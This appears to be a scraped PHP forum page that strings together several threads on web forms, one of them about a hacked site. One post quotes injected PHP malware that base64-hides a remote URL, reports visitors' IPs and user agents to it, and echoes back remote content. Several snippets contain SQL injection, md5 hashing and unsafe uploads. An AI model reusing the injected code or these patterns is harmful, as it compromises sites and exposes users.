PHP - I Believe The Form Submission On Our Website Has Been Hacked....
I have a php form submission on this website: www.judelawllc.com
There are several required fields...and when I try to get around them, I am unable to?? Yet, over the last week...we have been getting upwards of 500 submissions that are completely blank? I don't understand how that is possible...or how to correct it. I have tried to add a captcha to the form to add further protection, but the captcha image is too big for the space I have to put this form. I don't like the layout of this site, but I am stuck with it for now...could you let me know what information I can supply you to help figure out how this is happening? Thank you in advance! Similar TutorialsThe code below was inserted into every single index.php on one of my clients sites. It went through and every single index.php page (in each folder) had that following code put in. It was strange. As far as I can tell there are no FTP logs, besides my own IP. This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a full security audit yet. What could have caused this. The weird thing is it's not loading it into the very top of the file..the security.inc.php is my file..and somehow they always get inserted below that file. But the <? is inserted right after it. I also don't use generally the <? shorthand, that was his previous code..but that entire <? block that has the hack attempt is very strange. Any advice on how this is generally done, and anyone with similar issues? Code: [Select] <? require_once('security.inc.php'); ?><? if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?> Hi Chaps, After my clients' site was hacked just over a week ago, I took down the site and made some changes to the PHP scripts. - Backed-up the database, then removed it from the webhost - Removed all web files - Changed the FTP and SQL login credentials - Encrypted all user passwords - Secured the login/signup scripts with a Captcha tool. - Secured all account & checkout pages with cookie checks (forces login). - I validated all the user inputs for XSS. - Secured the SQL scripts with mysql_real_escape_string()/strip_tags()/str_replace(). - Used HTTP_REFERER on account/checkout pages I'm hoping this will sure up the front-end site. Whilst I was backing up the images folder (500Mb+) to my PC, I was warned of trojans and viruses. It turned out the hackers had placed php files (cid.php/sniper.php/etc) and a couple of files without extensions, into the main Images folder. Without knowing how they actually did this (whether they had access to the FTP site, gained access through the website, or through a virus on the laptop used to update the site/upload images), I would like to know what I can do to make sure that they can't do this again. There is no option for front-end users to upload files, but the administration site does allow image uploads. At the moment, the images folder permissions are set to 0775, I think this is correct. Is there something I can do to the Image folder permissions as a whole, or should I just run a regular check on the directories, checking for all non-image files, or any file/directory that doesn't have the 0775 permission? Are there any resources on protecting FTP folders with PHP, uploading files/directories to protected folders, good practices to continually check for unwanted files? Is there anything else I should be looking into, I did read something about the dangers of include()/require_once() The site is hosted on a shared server, and don't have access to the .htaccess files. Is there anything I can ask the hosting company to check that there firewall is working correctly? Sorry for the range of questions in this, but any help or guidance would be most appreciated. Many thanks I'm trying to figure out where my problem is. Its not submitting my form. I'm getting the alert but when it submits it does the url?variables=whatever deal. Code: [Select] <?php require ('php/eventnames.php'); ?> <script type="text/javascript" src="forms/addnew/js/eventnames.js"></script> <!-- Form --> <form action="#" id="eventNameForm" > <fieldset> <legend>Add New Event Name</legend> <div class="field required"> <label for="eventName">Event Name</label> <input type="text" class="text" name="eventName" id="eventName" title="Event Name"/> <span class="required-icon tooltip" title="Required field - This field is required, it cannot be blank, and must contain something that is different from emptyness in order to be filled in. ">Required</span> </div> <div class="field required"> <label for="shortName">Event Short Name</label> <input type="text" class="text" name="shortName" id="shortName" title="Event Short Name"/> <span class="required-icon tooltip" title="Required field - This field is required, it cannot be blank, and must contain something that is different from emptyness in order to be filled in. ">Required</span> </div> <div class="field required"> <label for="eventType">Event Type</label> <select class="dropdown" name="eventType" id="eventType" title="Event Type"> <option value="">- Select -</option> <?php $eventTypes = array('Singular', 'Recurring', 'Pay Per View'); foreach($eventTypes as $et): ?> <option value="<?php echo $et; ?>"><?php echo $et; ?></option> <?php endforeach; ?> </select> <span class="required-icon tooltip" title="Required field - This field is required, it cannot be blank, and must contain something that is different from emptyness in order to be filled in. ">Required</span> </div> <input type="hidden" name="userID" id="userID" value="<?php echo $userID; ?>" /> <input type="submit" class="submit" name="submitEventName" id="submitEventName" title="Submit Event Name" value="Submit Event Name"/> </fieldset> </form> <!-- /Form --> <!-- Messages --> <div class="message message-error"> <h6>Required field missing</h6> <p>Please fill in all required fields. </p> </div> <div class="message message-success"> <h6>Operation succesful</h6> <p>Content Page was added to the database.</p> </div> Code: [Select] $(document).ready(function() { $('div.message-error').hide(); $('div.message-success').hide(); alert("Test Alert!"); ("#eventNameForm").validate({ rules: { eventName: { required: true }, shortName: { required: true }, eventType: { required: true, rangelength: [1] } }, messages: { eventName: "Please enter the event name!", shortName: "Please enter the event's short name!", eventType: "Please enter the event type!" }, submitHandler: function(form) { var userID = $("input#userID").val(); var eventName = $("input#eventName").val(); var shortName = $("input#shortName").val(); var eventType = $("select#eventType").val(); var dataString = 'userID=' + userID + '&eventName=' + eventName + '&shortName=' + shortName + '&eventType=' + eventType + '&submitEventName=True'; $.ajax({ type: "POST", url: "processes/eventnames.php", data: dataString, success: function(myNewVar) { if (myNewVar == 'good') { $('div.message-error').hide(); $("div.message-success").html("<h6>Operation successful</h6><p>" + eventName + " Page saved successfully.</p>"); $("div.message-success").show().delay(10000).hide("slow"); $(':input','#eventNameForm') .not(':submit, :hidden') .val(''); } else if (myNewVar == 'bad1') { $('div.message-success').hide(); $("div.message-error").html("<h6>Operation unsuccessful</h6><p>" + eventName + " already exists in the database.</p>"); $("div.message-error").show(); } else if (myNewVar == 'bad2') { $('div.message-success').hide(); $("div.message-error").html("<h6>Operation unsuccessful</h6><p>" + shortName + " already exists in the database.</p>"); $("div.message-error").show(); } else if (myNewVar == 'bad3') { $('div.message-success').hide(); $("div.message-error").html("<h6>Operation unsuccessful</h6><p>" + eventName + " and " + shortName + " already exists in the database.</p>"); $("div.message-error").show(); } } }); return false; } }); }); Where should my Form go once it is submitted? I am reading through some old code, and I was using some pretty convoluted programming to get everything (e.g. error and success messages after form submittal) to work. Basically what I would do was... Code: [Select] HTML to Open Page PHP to Handle Form If Data Okay... Success Message (e.g. "Your account was created!") HTML to close out Page If Data Invalid... Failure Message (e.g. "A System Error occurred. Please contact the Administrator.") HTML to close out Page HTML Form HTML to Close Page I have heard that you should always put your PHP first in the script and then follow it up with your HTML Page and Form. But where should you go once the form is submitted? My second attempt at things - to fix the mess above - was to REDIRECT the user to a "Handling Page" which basically was a large case statement that would read a "processing code" and display the right message. But that seems kind of hokey too?! Can someone help me come up with a more professional and scalable solution?? Thanks, Debbie
Hi All, ## First Document if(!empty($_FILES["dc1"])){ $fileName1 = htmlspecialchars_decode((basename($_FILES["dc1"]["name"]))); $fileTypeA1 = pathinfo($fileName1, PATHINFO_EXTENSION); $targetFilePath1 = $uploadDir . $uID . '-' . $randnum . '.' .$fileTypeA1; if(move_uploaded_file($_FILES["dc1"]["tmp_name"], $targetFilePath1)){ $uploadedFile1 = $targetFilePath1; } } ## Second Document if(!empty($_FILES["dc2"])){ $fileName2 = htmlspecialchars_decode((basename($_FILES["dc2"]["name"]))); $fileTypeA2 = pathinfo($fileName2, PATHINFO_EXTENSION); $targetFilePath2 = $uploadDir . $uID . '-' . $randnum . '.' .$fileTypeA2; if(move_uploaded_file($_FILES["dc2"]["tmp_name"], $targetFilePath2)){ $uploadedFile2 = $targetFilePath2; } } Edited October 13, 2020 by SH1989 Clean code up If I have a standard HTML form in my PHP script and the User submits the form - which resubmits to itself for processing - and then the User hits the "Back" button and then the "Forward" button, why does the Form and its data get re-submitted?! What mechanics are exactly happening? I had a "Submit Payment" page that was doing that and so people would get charged twice and that is obviously a big problem. Please help me understand what causes that issue and different ways to fix it. Thanks, Debbie I am trying to process a simple registration form:- Code: [Select] <form method="POST" action="regproc.php"> <p>Choose a username:<br /><input name="nick" type="text" /></p> <p>Choose a password:<br /><input name="pwd" type="password" /></p> <p>Re-type password:<br /><input name="pwd2" type="password" /></p> <p>Sex:<br /><input name="sex" type="text" /></p> <p>Email address:<br /><input name="email" type="text" /></p> <p><input name="submit" type="button" value="Hit me NOW!" /></p> </form> but it does not call the relevant processing file "regproc.php" when the submit button is hit. I can't figure out just why this is and would appreciate any ideas. I know that the solution is probably very simple and staring me in the face if only I could see it... HI All - Hoping you can help me out here with an issue that's preventing me from posting a form. I am still stumbling my way through this. I have a form that submits to itself with php code that uses a $curlhandle to post to a remote server, return xml data and parse it. The submission to the remote server works perfectly and the data returned is fine. The problem I am having is that when the form page initially loads in the browser, it thinks the form is already trying to submit, and it returns an error message for the first blank field. The error message is from the remote site. There is no database involved with this and the information does not need to be saved, just displayed on the same page the form resides on. So, is there a way I can load the page with the form without getting the error message from the remote site? I'm not sure if this is exactly a coding help question, excuse me if its not. I want to know what is the best & secure way to submit a form to itself. I've tried to google the answer, but did not get a proper answer with explanation or may be I didnt use proper keywords to search it. Out of these which one do i use? Code: [Select] // Leave the action field empty. <form method="POST" action=""> //$PHP_SELF, also if i use echo $PHP_SELF my form does not work like it should. <form method="POST" action="<?$PHP_SELF?>"> //$_SERVER['PHP_SELF'], same problem as $PHP_SELF, it doesnt work if i use echo. <form method="POST" action="<?$_SERVER['PHP_SELF']?>"> hi i have the following contact us form which works fine. i need lil more tweaking. Right now when i submit the form it displays the information "blah blah", "the form has been submitted successfully" and also the form. What i want to do is if the form has been submitted successfully i need not display the form again. I need to display the data before the form field: "Blah Blah"(information before the form code) "the form has been submitted successfully" I do not need to display the form if it has been a successful submission. here is my code: Code: [Select] <?php include($headerpath); //change this to use mysql count function $totalentriesrow = mysql_query("SELECT DISTINCT userid FROM user", $con); $totalentriesrow = mysql_num_rows($totalentriesrow); ?> <title><?PHP echo $site_name; ?> Advertising</title> <BR><BR> <table cellpadding="5" cellspacing="1" bgcolor="white" border="0" width="900" align="center" style='border-top: 1px; border-right: 1px; border-left: 1px; border-bottom: 1px; border-color: black; border-style: solid;'> <tr> <td bgcolor='<?PHP echo $head; ?>' align='left'><b><font color='<?PHP echo $head_font_color; ?>' size='2' face='verdana'><?PHP echo $site_name; ?> Advertising</font></b> Blah Blah Blah Blah </td> </tr> <? //echo '<center><h4><font color="blue"><br>CONTACT US<br></font></h4></center>'; // Create an empty array to hold the error messages. $arrErrors = array(); //Only validate if the Submit button was clicked. if (!empty($_POST['submit'])) { // Each time theres an error, add an error message to the error array // using the field name as the key. if (empty($_POST['first_name'])) $arrErrors['first_name'] = '<br><font color="red">Please provide your first name.</font>'; if (empty($_POST['last_name'])) $arrErrors['last_name'] = '<br><font color="red">Please provide your last name.</font>'; if (empty($_POST['business_name'])) $arrErrors['business_name'] = '<br><font color="red">Please provide your business name.</font>'; if (empty($_POST['website_url'])) $arrErrors['website_url'] = '<br><font color="red">Please provide a website url.</font>'; if (empty($_POST['street_address'])) $arrErrors['street_address'] = '<br><font color="red">Please provide your street address.</font>'; if (empty($_POST['city'])) $arrErrors['city'] = '<br><font color="red">Please provide your city name.</font>'; if (empty($_POST['state'])) $arrErrors['state'] = '<br><font color="red">Please provide your state.</font>'; if (empty($_POST['zip'])) $arrErrors['zip'] = '<br><font color="red">Please provide your zip.</font>'; if (empty($_POST['country'])) $arrErrors['country'] = '<br><font color="red">Please provide your country.</font>'; if (empty($_POST['email_address'])) $arrErrors['email_address'] = '<br><font color="red">A valid email address is required.</font>'; if (empty($_POST['phone']) || (!is_numeric($_POST['phone']))) $arrErrors['phone'] = '<br><font color="red">Phone number cannot be empty and has to be numeric.</font>'; if (empty($_POST['description'])) $arrErrors['description'] = '<br><font color="red">Description cannot be empty.</font>'; // If the error array is empty, there were no errors. // Insert form processing here. if (count($arrErrors) == 0) { $first_name=cleaninput($_POST['first_name']); $last_name=cleaninput($_POST['last_name']); $business_name=cleaninput($_POST['business_name']); $website_url=cleaninput($_POST['website_url']); $street_address=cleaninput($_POST['street_address']); $city=cleaninput($_POST['city']); $state=cleaninput($_POST['state']); $zip=cleaninput($_POST['zip']); $country=cleaninput($_POST['country']); $email_address=cleaninput($_POST['email_address']); $phone=cleaninput($_POST['phone']); $description=cleaninput($_POST['description']); $to = $advertising_contacts; $subject = "Advertisement Contact"; $message="You have a new advertising contact<br>"; $message.="<b>First name:</b> ".stripslashes($first_name)."<br><b>Last Name:</b> ".stripslashes($last_name); $message.="<br><b>Business Name:</b> ".stripslashes($business_name)."<br><b>Business Description: </b>".stripslashes($description)."<br><b>Business URL:</b> ".stripslashes($website_url); $message.="<br><b>Street Address:</b> ".stripslashes($street_address)."<br><b>City:</b> ".stripslashes($city); $message.="<br><b>State:</b> ".stripslashes($state)."<br><b>Zip:</b> ".stripslashes($zip)."<br><b>Country:</b> ".stripslashes($country); $message.="<br><b>Email:</b> ".stripslashes($email_address)."<br><b>Phone:</b> ".stripslashes($phone); $from = "webmaster@example.com"; $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; $headers .= 'From: Admin <Admin@groupbuilder.com>' . "\r\n"; // Send email mail($to,$subject,$message,$headers); //escapeinput for inserting into database $first_name=escapeinput($first_name); $last_name=escapeinput($last_name); $website_url=escapeinput($website_url); $street_address=escapeinput($street_address); $city=escapeinput($city); $state=escapeinput($state); $zip=escapeinput($zip); $country=escapeinput($country); $email=escapeinput($email); $phone=escapeinput($phone); $description=escapeinput($description); $dateline=time(); //Insert the details into database $insert_contacts=mysql_query("INSERT INTO adcontacts(first_name,last_name,email_address,phone,business_name,description,website_url,street_address,city,state,zip,country,dateline) VALUES('$first_name','$last_name','$email_address','$phone','$business_name','$description','$website_url','$street_address','$city','$state','$zip','$country','$dateline')") or die(mysql_error()); echo "<center>Form Submitted Successfully</center><br>"; } else { // The error array had something in it. There was an error. // Start adding error text to an error string. echo "<center>There was an error in the form<br></center>"; $strError=""; foreach ($arrErrors as $error) { $strError .= $error; } } } ?> <tr> <td> <? echo "<table align= 'center' width='50%' style='border-top: 1px; border-right: 1px; border-left: 1px; border-bottom: 1px; border-color: black; border-style: solid;'>"; ?> <tr> <td> <form action="<?php echo $PHP_SELF;?>" method="post"> <tr height='40'> <td> <font color="black"><B> First Name: </B></font> </td> <td><input type="text" size ="40" name="first_name" value="<? if(!empty($strError)) {echo cleaninput($_POST['first_name']);}?>" /> <?php if (!empty($arrErrors['first_name'])) echo $arrErrors['first_name']; ?> </td> </tr> <tr height='40'> <td><font color="black"><B> Last Name: </B></font></td> <td><input type="text" size ="40" name="last_name" value="<? if(!empty($strError)) { echo cleaninput($_POST['last_name']);}?>"/> <?php if (!empty($arrErrors['last_name'])) echo $arrErrors['last_name']; ?> </td> </tr> <tr height='40'> <td><font color="black"><B> Email Address: </B></font></td> <td><input type="text" size ="40" name="email_address" value="<? if(!empty($strError)) { echo cleaninput($_POST['email_address']);}?>"/> <?php if (!empty($arrErrors['email_address'])) echo $arrErrors['email_address']; ?> </td> </tr> <tr height='35'> <td><font color="black"><B> Business Name: </B></font></td> <td><input type="text" size ="40" name="business_name" value="<? if(!empty($strError)) { echo cleaninput($_POST['business_name']);}?>" /> <?php if (!empty($arrErrors['business_name'])) echo $arrErrors['business_name']; ?> </td> </tr> <tr> <td><font color="black"><B> Business Description: </B></font></td> <td ><textarea rows=7 cols=31 name="description"><? if(!empty($strError)) { echo cleaninput($_POST['description']);}?></textarea> <?php if (!empty($arrErrors['description'])) echo $arrErrors['description']; ?> </td> </tr> <tr height='40'> <td><font color="black"><B> Business URL: </B></font></td> <td><input type="text" size ="40" name="website_url" value="<? if(!empty($strError)) { echo cleaninput($_POST['website_url']);}?>" /> <?php if (!empty($arrErrors['website_url'])) echo $arrErrors['website_url']; ?> </td> </tr> <tr height='40'> <td><font color="black"><B> Business Phone: </B></font></td> <td><input type="text" size ="40" name="phone" value="<? if(!empty($strError)) { echo cleaninput($_POST['phone']);}?>"/> <?php if (!empty($arrErrors['phone'])) echo $arrErrors['phone']; ?> </td> </tr> <tr height='40'> <td><font color="black"><B> Street Address: </B></font></td> <td><input type="text" size ="40" name="street_address" value="<? if(!empty($strError)) { echo cleaninput($_POST['street_address']);}?>" /> <?php if (!empty($arrErrors['street_address'])) echo $arrErrors['street_address']; ?> </td> </tr> <tr height='40'> <td><font color="black"><B> City: </B></font></td> <td><input type="text" size ="40" name="city" value="<? if(!empty($strError)) { echo cleaninput($_POST['city']);}?>" /> <?php if (!empty($arrErrors['city'])) echo $arrErrors['city']; ?> </td> </tr> <tr height='40'> <td><font color="black"><B> State: </B></font></td> <td><input type="text" size ="40" name="state" value="<? if(!empty($strError)) { echo cleaninput($_POST['state']);}?>"/> <?php if (!empty($arrErrors['state'])) echo $arrErrors['state']; ?> </td> </tr> <tr height='40'> <td><font color="black"><B> Zip: </B></font></td> <td><input type="text" size ="40" name="zip" value="<? if(!empty($strError)) { echo cleaninput($_POST['zip']);}?>"/> <?php if (!empty($arrErrors['zip'])) echo $arrErrors['zip']; ?> </td> </tr> <tr height='40'> <td><font color="black"><B> Country: </B></font></td> <td> <select name="country"> <option value="<? if(!empty($strError)) { echo $_POST['country'];}?>"><?echo cleaninput($_POST['country']);?></option> <?php foreach($array as $key=>$value){ ?> <option value="<?php echo $value; ?>"><?php echo $value; ?></option> <?php }?> </select> <?php if (!empty($arrErrors['country'])) echo $arrErrors['country']; ?> </td> </tr> <tr height='35'> <td></td> <td><input type="submit" name="submit" value="submit" /></td> </tr> </form> </tr> </td> </table> </td> </tr> </table> Hi all, I am wondering if nayone can spot why more form is not processing, basically the page just loads afresh once details have been entered and submit button clicked The page is called client.php <?php session_start(); if (isset($_POST['submit'])) { include('config.php'); $username = $_POST['username']; $password = md5($_POST['password']); $query = mysql_query("SELECT email,password FROM customers WHERE email='$username' AND password = '$password'"); $count=mysql_num_rows($query); if($count==1) { $query1= mysql_query("SELECT id FROM customers WHERE email='$username'"); echo mysql_error() ; while($row = mysql_fetch_assoc($query1)) { $id = $row['id']; $_SESSION['id'] = $id; $_SESSION['logged'] = "SET"; header("Location: client.php?id=$id"); } } else { echo "<script>alert('Incorrect Login Details')</script>"; } } ?> <link href="styles/style.css" rel="stylesheet" type="text/css" /> <link href="styles/form_clean.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="scripts/pageload.js"></script> <script type="text/javascript"> function swapImages(that) { that.src = (that.src.indexOf('buttonselected')>-1) ? ("images/"+that.id+"button.gif") : ("images/"+that.id+"buttonselected.gif"); } </script> <link href="styles/form_clean.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="main"> <div id="links"> <a href="index.php"><img src="images/homebutton.gif" alt="Home Button" class="buttons" id="home" onmouseover="swapImages(this)" onmouseout="swapImages(this)" /></a> <a href="javascript:ajaxpage('packages.php', 'content');"><img src="images/packagebutton.gif" alt="Packages Button" class="buttons" id="package" onmouseover="swapImages(this)" onmouseout="swapImages(this)" /></a> <a href="javascript:ajaxpage('purchase.php', 'content');"><img src="images/purchasebutton.gif" alt="Purchase Button" class="buttons" id="purchase" onmouseover="swapImages(this)" onmouseout="swapImages(this)" /></a> <a href="javascript:ajaxpage('contact.php', 'content');"><img src="images/contactabutton.gif" alt="Contact Button" class="buttons" id="contacta" onmouseover="swapImages(this)" onmouseout="swapImages(this)" /></a> <a href="client.php"><img src="images/clientbutton.gif" alt="Client Button" class="buttons" id="client" onmouseover="swapImages(this)" onmouseout="swapImages(this)" /></a> </div> <div id="logobox"><img src="images/logo.png" alt="JollyHosting.com - Simplified Reseller Hosting"/> </div> <div id="content"> <img src="images/gaptop.png" alt="seperator" /> <?php if(!isset($_SESSION['logged'])) { ?> <h2> Please Login</h2> <div id="login"> <form class="clean" action="client.php" method="post"> <ol> <li> <fieldset> <legend>Login</legend> <ol> <li> <label for="username">Email Address</label> <input type="text" id="username" name="username" value="" /> </li> <li> <label for="password">Password</label> <input type="password" id="password" name="password" value="" /> </li> </ol> </fieldset> </li> </ol> <p style="text-align:right;"> <input type="submit" value="OK" /> </p> </form> </div> <?php } else { echo "loggin in"; } ?> </div> <?php include('footer.php');?> </div> </body> </html> Many thanks Hi Guys, I have a form on a website http://www.wewillbuyyourcar.ie/sellyourcar.html. This form has several fields and all fields need to be submitted to a designated email address on submission. To be honest im not sure where im at with it i cant get it to submit so i need some help to validate it and submit and then maybe display a html page to the user like thankyou.html. Heres the code needed. This is the form Code: [Select] <div id="contact_form"> <form id="contact" action="process.php"> <fieldset> <TR><TD><TABLE BORDER="0" CELLPADDING="3" CELLSPACING="0" WIDTH="50%"> <FORM ACTION="" METHOD="post" name="sellcarform" onsubmit="" > <TR><TD CLASS="tableBlueBody" ALIGN="right">* <B>First Name</B></TD><TD CLASS="tableBlueBody" STYLE="border-right : 1px solid #CCCCCC;" ALIGN="left"><INPUT TYPE="Text" NAME="firstname" MAXLENGTH="150"></TD><TD CLASS="tableBlueBody" ALIGN="right">* <B>Last Name</B></TD><TD CLASS="tableBlueBody" ALIGN="center"><INPUT TYPE="Text" NAME="lastname" MAXLENGTH="150"></TD></TR> <TR><TD CLASS="tableBlueBody" ALIGN="right"><B>Address</B></TD><TD CLASS="tableBlueBody" STYLE="border-right : 1px solid #CCCCCC;" ALIGN="left"><INPUT TYPE="Text" NAME="AddressLine1" MAXLENGTH="150"></TD><TD CLASS="tableBlueBody" ALIGN="right">* <B>Email</B></TD><TD CLASS="tableBlueBody" ALIGN="center"><INPUT TYPE="Text" NAME="email" MAXLENGTH="150"></TD></TR> <TR><TD CLASS="tableBlueBody" ALIGN="right"><B>City</B></TD><TD CLASS="tableBlueBody" STYLE="border-right : 1px solid #CCCCCC;" ALIGN="left"><INPUT TYPE="Text" NAME="City" MAXLENGTH="150"></TD><TD CLASS="tableBlueBody" ALIGN="right">* <B>Phone</B></TD><TD CLASS="tableBlueBody" ALIGN="center"><INPUT TYPE="Text" NAME="phone" MAXLENGTH="150"></TD></TR> <TR><TD CLASS="tableBlueBody" ALIGN="right"><B>Country</B></TD><TD CLASS="tableBlueBody" STYLE="border-right : 1px solid #CCCCCC;" ALIGN="left"> <select name="CountryID"> <option value="1" >Albania</option> <option value="2" >Algeria</option> <option value="3" >American Samoa</option> <option value="4" >Andorra</option> <option value="5" >Anguilla</option> <option value="6" >Antartica</option> <option value="7" >Antigua & Barbuda</option> <option value="8" >Argentina</option> <option value="9" >Armenia</option> <option value="10" >Aruba</option> <option value="11" >Australia</option> <option value="12" >Austria</option> <option value="13" >Azerbaijan</option> <option value="14" >Bahamas</option> <option value="15" >Bahrain</option> <option value="16" >Bangladesh</option> <option value="17" >Barbados</option> <option value="18" >Belarus</option> <option value="19" >Belgium</option> <option value="20" >Belize</option> <option value="21" >Benin</option> <option value="22" >Bermuda</option> <option value="23" >Bhutan</option> <option value="24" >Bolivia</option> <option value="25" >Botswana</option> <option value="26" >Bouvet Island</option> <option value="27" >Brazil</option> <option value="28" >British Indian Ocean Terr.</option> <option value="29" >Brunei Darussalam</option> <option value="30" >Bulgaria</option> <option value="31" >Burkina Faso</option> <option value="32" >Burundi</option> <option value="33" >Cambodia</option> <option value="34" >Cameroon</option> <option value="35" >Canada</option> <option value="36" >Cape Verde</option> <option value="37" >Cayman Islands</option> <option value="38" >Central African Republic</option> <option value="39" >Chad</option> <option value="40" >Chile</option> <option value="41" >China</option> <option value="42" >Christmas Island</option> <option value="43" >Cocos (Keeling) Isl</option> <option value="44" >Colombia</option> <option value="45" >Comoros</option> <option value="46" >Congo</option> <option value="47" >Cook Isl</option> <option value="48" >Costa Rica</option> <option value="49" >Cote D'Ivoire</option> <option value="50" >Croatia</option> <option value="51" >Cyprus</option> <option value="52" >Czech Republic</option> <option value="53" >Denmark</option> <option value="54" >Djibouti</option> <option value="55" >Dominica</option> <option value="56" >Dominican Republic</option> <option value="57" >East Timor</option> <option value="58" >Ecuador</option> <option value="59" >Egypt</option> <option value="60" >El Salvador</option> <option value="61" >Equatorial Guinea</option> <option value="62" >Estonia</option> <option value="63" >Ethiopia</option> <option value="64" >Faeroe Islands</option> <option value="65" >Falkland Isl. (Malvinas)</option> <option value="66" >Fiji</option> <option value="67" >Finland</option> <option value="68" >France</option> <option value="69" >French Guiana</option> <option value="70" >French Polynesia</option> <option value="71" >French Southern Terr.</option> <option value="72" >Gabon</option> <option value="73" >Gambia</option> <option value="74" >Georgia</option> <option value="75" >Germany</option> <option value="76" >Ghana</option> <option value="77" >Gibraltar</option> <option value="78" >Greece</option> <option value="79" >Greenland</option> <option value="80" >Grenada</option> <option value="81" >Guadeloupe</option> <option value="82" >Guam</option> <option value="83" >Guatemala</option> <option value="84" >Guernsey C.I.</option> <option value="85" >Guinea</option> <option value="86" >Guinea-Bissau</option> <option value="87" >Guyana</option> <option value="88" >Haiti</option> <option value="89" >Heard and McDonald Isl</option> <option value="90" >Honduras</option> <option value="91" >Hong Kong</option> <option value="92" >Hungary</option> <option value="93" >Iceland</option> <option value="94" >India</option> <option value="95" >Indonesia</option> <option value="96" selected >Ireland</option> <option value="97" >Isle of Man</option> <option value="98" >Israel</option> <option value="99" >Italy</option> <option value="100" >Jamaica</option> <option value="101" >Japan</option> <option value="102" >Jersey C.I.</option> <option value="103" >Jordan</option> <option value="104" >Kazakhstan</option> <option value="105" >Kenya</option> <option value="106" >Kiribati</option> <option value="107" >Korea Republic of</option> <option value="108" >Kuwait</option> <option value="109" >Kyrgyzstan</option> <option value="110" >Laos</option> <option value="111" >Latvia</option> <option value="112" >Lebanon</option> <option value="113" >Lesotho</option> <option value="114" >Liberia</option> <option value="115" >Liechtenstein</option> <option value="116" >Lithuania</option> <option value="117" >Luxemborg</option> <option value="118" >Macau</option> <option value="119" >Madagascar</option> <option value="120" >Malawi</option> <option value="121" >Malaysia</option> <option value="122" >Maldives</option> <option value="123" >Mali</option> <option value="124" >Malta</option> <option value="125" >Marshall Isl</option> <option value="126" >Martinique</option> <option value="127" >Mauritania</option> <option value="128" >Mauritius</option> <option value="129" >Mexico</option> <option value="130" >Micronesia</option> <option value="131" >Moldova Republic of</option> <option value="132" >Monaco</option> <option value="133" >Mongolia</option> <option value="134" >Montserrat</option> <option value="135" >Morocco</option> <option value="136" >Mozambique</option> <option value="137" >Myanmar</option> <option value="138" >Namibia</option> <option value="139" >Nauru</option> <option value="140" >Nepal</option> <option value="141" >Netherland Antilles</option> <option value="142" >Netherlands</option> <option value="143" >New Caledonia</option> <option value="144" >New Zealand</option> <option value="145" >Nicaragua</option> <option value="146" >Niger</option> <option value="147" >Nigeria</option> <option value="148" >Niue</option> <option value="149" >Norfolk Isl</option> <option value="150" >Northern Mariana Isl</option> <option value="151" >Norway</option> <option value="152" >Oman</option> <option value="153" >Pakistan</option> <option value="154" >Palau</option> <option value="155" >Panama</option> <option value="156" >Panama Canal Zone</option> <option value="157" >Papua New Guinea</option> <option value="158" >Paraguay</option> <option value="159" >Peru</option> <option value="160" >Philippines</option> <option value="161" >Pitcairn</option> <option value="162" >Poland</option> <option value="163" >Portugal</option> <option value="164" >Puerto Rico</option> <option value="165" >Qatar</option> <option value="166" >Rest of World</option> <option value="167" >Reunion</option> <option value="168" >Romania</option> <option value="169" >Russian Federation</option> <option value="170" >Rwanda</option> <option value="171" >Saint Kitts & Nevis</option> <option value="172" >Saint Lucia</option> <option value="173" >Samoa</option> <option value="174" >San Marino</option> <option value="175" >Sao Tome & Principe</option> <option value="176" >Saudi Arabia</option> <option value="177" >Senegal</option> <option value="178" >Seychelles</option> <option value="179" >Sierra Leone</option> <option value="180" >Singapore</option> <option value="181" >Slovakia</option> <option value="182" >Slovenia</option> <option value="183" >Solomon Islands</option> <option value="184" >Somalia</option> <option value="185" >South Africa</option> <option value="186" >Spain</option> <option value="187" >Sri Lanka</option> <option value="188" >St. Helena</option> <option value="189" >St. Pierre and Miquelon</option> <option value="190" >St. Vincent & Grenadines</option> <option value="191" >Suriname</option> <option value="192" >Svalbard & Jan Mayen Isl</option> <option value="193" >Swaziland</option> <option value="194" >Sweden</option> <option value="195" >Switzerland</option> <option value="196" >Taiwan</option> <option value="197" >Tajikistan</option> <option value="198" >Tanzania United Republic</option> <option value="199" >Thailand</option> <option value="200" >Togo</option> <option value="201" >Tokelau</option> <option value="202" >Tonga</option> <option value="203" >Trinidad & Tobago</option> <option value="204" >Tunisia</option> <option value="205" >Turkey</option> <option value="206" >Turkmenistan</option> <option value="207" >Turks and Caicos Isl</option> <option value="208" >Tuvalu</option> <option value="209" >U.A.E.</option> <option value="210" >U.S.Minor Outlying Isl</option> <option value="211" >Uganda</option> <option value="212" >Ukraine</option> <option value="213" >United Kingdom</option> <option value="214" >United States</option> <option value="215" >Uruguay</option> <option value="216" >Uzbekistan</option> <option value="217" >Vanuatu</option> <option value="218" >Vatican City State</option> <option value="219" >Venezuela</option> <option value="220" >Viet Nam</option> <option value="221" >Virgin Isl (British)</option> <option value="222" >Virgin Isl (U.S.)</option> <option value="223" >Wallis & Futuna Islands</option> <option value="224" >Western Sahara</option> <option value="225" 